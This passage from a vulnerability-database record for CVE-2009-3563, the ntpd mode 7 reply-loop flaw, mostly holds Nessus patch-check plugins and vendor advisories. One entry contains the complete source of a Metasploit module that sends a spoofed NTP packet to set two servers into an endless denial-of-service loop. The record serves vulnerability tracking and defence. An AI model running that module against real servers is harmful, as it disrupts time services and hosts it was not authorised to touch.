those packets get\nthrough.'\n\n'If an attacker spoofs an address of ntpd host A in a mode 7\nresponse packet sent to ntpd host A, then host A will\nrespond to itself endlessly, consuming CPU and logging\nexcessively.'.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xntpd_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"04\", patch:\"IZ71071_04\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.4.0\", maxfilesetver:\"6.1.4.3\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-06T09:26:03", "description": "An updated ntp package that fixes a security issue is now available\nfor Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Network Time Protocol (NTP) is used to synchronize a computer's\ntime with a referenced time source.\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd\nhandled certain malformed NTP packets. ntpd logged information about\nall such packets and replied with an NTP packet that was treated as\nmalformed when received by another ntpd. A remote attacker could use\nthis flaw to create an NTP packet reply loop between two ntpd servers\nvia a malformed packet with a spoofed source IP address and port,\ncausing ntpd on those servers to use excessive amounts of CPU time and\nfill disk space with log messages. (CVE-2009-3563)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains a backported patch to resolve this issue. After installing\nthe update, the ntpd daemon will restart automatically.", "edition": 27, "published": "2009-12-09T00:00:00", "title": "CentOS 4 / 5 : ntp (CESA-2009:1648)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2009-12-09T00:00:00", "cpe": ["p-cpe:/a:centos:centos:ntp", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2009-1648.NASL", "href": "https://www.tenable.com/plugins/nessus/43071", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1648 and \n# CentOS Errata and Security Advisory 2009:1648 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43071);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-3563\");\n script_xref(name:\"RHSA\", value:\"2009:1648\");\n\n script_name(english:\"CentOS 4 / 5 : ntp (CESA-2009:1648)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated ntp package that fixes a security issue is now available\nfor Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Network Time Protocol (NTP) is used to synchronize a computer's\ntime with a referenced time source.\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd\nhandled certain malformed NTP packets. ntpd logged information about\nall such packets and replied with an NTP packet that was treated as\nmalformed when received by another ntpd. A remote attacker could use\nthis flaw to create an NTP packet reply loop between two ntpd servers\nvia a malformed packet with a spoofed source IP address and port,\ncausing ntpd on those servers to use excessive amounts of CPU time and\nfill disk space with log messages. (CVE-2009-3563)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains a backported patch to resolve this issue. After installing\nthe update, the ntpd daemon will restart automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-December/016360.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96d8db42\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-December/016361.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c315a515\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-December/016405.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6dc67174\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-December/016406.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5a95f2d9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"ntp-4.2.0.a.20040617-8.el4_8.2.centos\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"ntp-4.2.0.a.20040617-8.el4_8.2.centos\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"ntp-4.2.2p1-9.el5.centos.2.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-06T09:18:18", "description": "The remote host is missing AIX PTF U832257, which is related to the\nsecurity of the package bos.net.tcp.client.\n\nNTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control\nutility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while\nroutine NTP time transfers use modes 1 through 5. Upon receipt of an\nincorrect mode 7 request or a mode 7 error response from an address\nthat is not listed in a 'restrict ... noquery' or 'restrict ...\nignore' segment, ntpd will reply with a mode 7 error response and log\na message.\n\nIf an attacker spoofs the source address of ntpd host A in a mode 7\nresponse packet sent to ntpd host B, both A and B will continuously\nsend each other error responses, for as long as those packets get\nthrough.\n\nIf an attacker spoofs an address of ntpd host A in a mode 7\nresponse packet sent to ntpd host A, then host A will\nrespond to itself endlessly, consuming CPU and logging\nexcessively.\n", "edition": 29, "published": "2010-05-19T00:00:00", "title": "AIX 5.3 TL 8 : bos.net.tcp.client (U832257)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2010-05-19T00:00:00", "cpe": ["cpe:/o:ibm:aix:5.3"], "id": "AIX_U832257.NASL", "href": "https://www.tenable.com/plugins/nessus/46470", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were extracted\n# from AIX Security PTF U832257. The text itself is copyright (C)\n# International Business Machines Corp.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46470);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-3563\");\n script_bugtraq_id(37255);\n\n script_name(english:\"AIX 5.3 TL 8 : bos.net.tcp.client (U832257)\");\n script_summary(english:\"Check for PTF U832257\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is missing AIX PTF U832257, which is related to the\nsecurity of the package bos.net.tcp.client.\n\nNTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control\nutility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while\nroutine NTP time transfers use modes 1 through 5. Upon receipt of an\nincorrect mode 7 request or a mode 7 error response from an address\nthat is not listed in a 'restrict ... noquery' or 'restrict ...\nignore' segment, ntpd will reply with a mode 7 error response and log\na message.\n\nIf an attacker spoofs the source address of ntpd host A in a mode 7\nresponse packet sent to ntpd host B, both A and B will continuously\nsend each other error responses, for as long as those packets get\nthrough.\n\nIf an attacker spoofs an address of ntpd host A in a mode 7\nresponse packet sent to ntpd host A, then host A will\nrespond to itself endlessly, consuming CPU and logging\nexcessively.\n\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www-01.ibm.com/support/docview.wss?uid=isg1IZ68659\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate missing security-related fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AIX/oslevel\", \"Host/AIX/version\", \"Host/AIX/lslpp\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif ( aix_check_patch(ml:\"530008\", patch:\"U832257\", package:\"bos.net.tcp.client.5.3.8.12\") < 0 ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-06T09:17:57", "description": "'NTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control\nutility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while\nroutine NTP time transfers use modes 1 through 5. Upon receipt of an\nincorrect mode 7 request or a mode 7 error response from an address\nthat is not listed in a 'restrict ... noquery' or 'restrict ...\nignore' segment, ntpd will reply with a mode 7 error response and log\na message.'\n\n'If an attacker spoofs the source address of ntpd host A in a mode 7\nresponse packet sent to ntpd host B, both A and B will continuously\nsend each other error responses, for as long as those packets get\nthrough.'\n\n'If an attacker spoofs an address of ntpd host A in a mode 7\nresponse packet sent to ntpd host A, then host A will\nrespond to itself endlessly, consuming CPU and logging\nexcessively.'.", "edition": 24, "published": "2013-01-24T00:00:00", "title": "AIX 5.3 TL 10 : xntpd (IZ71608)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:ibm:aix:5.3"], "id": "AIX_IZ71608.NASL", "href": "https://www.tenable.com/plugins/nessus/63802", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xntpd_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63802);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-3563\");\n script_xref(name:\"CERT\", value:\"568372\");\n\n script_name(english:\"AIX 5.3 TL 10 : xntpd (IZ71608)\");\n script_summary(english:\"Check for APAR IZ71608\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"'NTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control\nutility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while\nroutine NTP time transfers use modes 1 through 5. Upon receipt of an\nincorrect mode 7 request or a mode 7 error response from an address\nthat is not listed in a 'restrict ... noquery' or 'restrict ...\nignore' segment, ntpd will reply with a mode 7 error response and log\na message.'\n\n'If an attacker spoofs the source address of ntpd host A in a mode 7\nresponse packet sent to ntpd host B, both A and B will continuously\nsend each other error responses, for as long as those packets get\nthrough.'\n\n'If an attacker spoofs an address of ntpd host A in a mode 7\nresponse packet sent to ntpd host A, then host A will\nrespond to itself endlessly, consuming CPU and logging\nexcessively.'.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xntpd_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"10\", patch:\"IZ71608_10\", package:\"bos.net.tcp.client\", minfilesetver:\"5.3.10.0\", maxfilesetver:\"5.3.10.2\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:27", "description": "A vulnerability has been found and corrected in ntp :\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd\nhandled certain malformed NTP packets. ntpd logged information about\nall such packets and replied with an NTP packet that was treated as\nmalformed when received by another ntpd. A remote attacker could use\nthis flaw to create an NTP packet reply loop between two ntpd servers\nvia a malformed packet with a spoofed source IP address and port,\ncausing ntpd on those servers to use excessive amounts of CPU time and\nfill disk space with log messages (CVE-2009-3563).\n\nThis update provides a solution to this vulnerability.", "edition": 25, "published": "2009-12-09T00:00:00", "title": "Mandriva Linux Security Advisory : ntp (MDVSA-2009:328)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2009-12-09T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:ntp-client", "cpe:/o:mandriva:linux:2008.0", "cpe:/o:mandriva:linux:2009.1", "p-cpe:/a:mandriva:linux:ntp", "cpe:/o:mandriva:linux:2010.0", "p-cpe:/a:mandriva:linux:ntp-doc"], "id": "MANDRIVA_MDVSA-2009-328.NASL", "href": "https://www.tenable.com/plugins/nessus/43077", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:328. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43077);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3563\");\n script_bugtraq_id(37255);\n script_xref(name:\"MDVSA\", value:\"2009:328\");\n\n script_name(english:\"Mandriva Linux Security Advisory : ntp (MDVSA-2009:328)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in ntp :\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd\nhandled certain malformed NTP packets. ntpd logged information about\nall such packets and replied with an NTP packet that was treated as\nmalformed when received by another ntpd. A remote attacker could use\nthis flaw to create an NTP packet reply loop between two ntpd servers\nvia a malformed packet with a spoofed source IP address and port,\ncausing ntpd on those servers to use excessive amounts of CPU time and\nfill disk space with log messages (CVE-2009-3563).\n\nThis update provides a solution to this vulnerability.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ntp, ntp-client and / or ntp-doc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ntp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ntp-4.2.4-10.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ntp-client-4.2.4-10.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ntp-doc-4.2.4-10.3mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"ntp-4.2.4-18.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"ntp-client-4.2.4-18.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"ntp-doc-4.2.4-18.5mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"ntp-4.2.4-22.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"ntp-client-4.2.4-22.3mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"ntp-doc-4.2.4-22.3mdv2009.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.0\", reference:\"ntp-4.2.4-27.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"ntp-client-4.2.4-27.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"ntp-doc-4.2.4-27.1mdv2010.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-17T23:58:35", "description": "This module exploits a denial of service vulnerability within the NTP (network time protocol) demon. By sending a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun!\n", "published": "2009-12-13T02:56:20", "type": "metasploit", "title": "NTP.org ntpd Reserved Mode Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3563"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/DOS/NTP/NTPD_RESERVED_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NTP.org ntpd Reserved Mode Denial of Service',\n 'Description' => %q{\n This module exploits a denial of service vulnerability\n within the NTP (network time protocol) demon. By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!\n },\n 'Author' => [ 'todb' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'BID', '37255' ],\n [ 'CVE', '2009-3563' ],\n [ 'OSVDB', '60847' ],\n [ 'URL', 'https://support.ntp.org/bugs/show_bug.cgi?id=1331' ]\n ],\n 'DisclosureDate' => 'Oct 04 2009'))\n\n register_options(\n [\n OptAddressLocal.new('LHOST', [true, \"The spoofed address of a vulnerable ntpd server\" ])\n ])\n deregister_options('FILTER','PCAPFILE')\n\n end\n\n def run_host(ip)\n open_pcap\n\n print_status(\"Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}\")\n\n p = PacketFu::UDPPacket.new\n p.ip_saddr = datastore['LHOST']\n p.ip_daddr = ip\n p.ip_ttl = 255\n p.udp_src = 123\n p.udp_dst = 123\n p.payload = [\"\\x17\", \"\\x97\\x00\\x00\\x00\"][rand(2)]\n p.recalc\n capture_sendto(p,ip)\n\n close_pcap\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "cisco": [{"lastseen": "2020-12-24T11:42:04", "bulletinFamily": "software", "cvelist": ["CVE-2009-3563"], "description": "The Network Time Protocol (NTP) package contains a vulnerability that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\nThe vulnerability is due to an error in handling certain malformed messages. An unauthenticated, remote attacker could send a malicious NTP packet with a spoofed source IP address to a vulnerable host. Once the host processes the packet, it could send a similar packet to another NTP host. This action could start a message loop between both hosts that could cause them to consume excessive CPU resources and disk space writing messages to log files. These two conditions could cause a DoS condition on the affected hosts.\n\nFunctional exploit code is available.\n\nNTP.org has confirmed this vulnerability in a changelog and released updated software.\n\nThis vulnerability can be exploited in one of two ways. It can be used to attack a single system running NTP and cause it to send packets to itself. Alternatively, it could be used to target two systems running NTP. In this case, the two systems would rapidly send messages back and forth between each other, causing a DoS condition on each system as well as consuming network bandwidth to carry the messages.", "modified": "2015-05-12T19:46:51", "published": "2009-12-08T22:33:40", "id": "CISCO-SA-20091208-CVE-2009-3563", "href": 